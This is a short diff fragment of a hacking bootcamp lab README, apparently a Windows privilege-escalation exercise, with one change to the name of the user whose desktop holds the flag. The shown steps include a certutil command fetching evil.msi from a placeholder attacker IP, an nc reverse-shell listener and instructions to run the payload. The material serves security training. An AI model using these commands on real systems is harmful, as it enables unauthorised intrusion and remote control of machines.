IamdLite/Positive-Hack-Bootcamp-2025/labs/day 7/README.md

    certutil -urlcache -f http://<ATTACKER-IP>/evil.msi evil.msi
    ```
    - Start a listener on Kali `nc -nlvp <PORT>`
    - Execute the payload (evil.msi) `./evil.msi` on the windows machine and catch the shell.
-Find the flag in the desktop directory of the user john.
+Find the flag in the desktop directory of the user Michael.

 #### Why It Works
 Misconfigured permissions grant low-privileged users access to sensitive resources, enabling privilege escalation.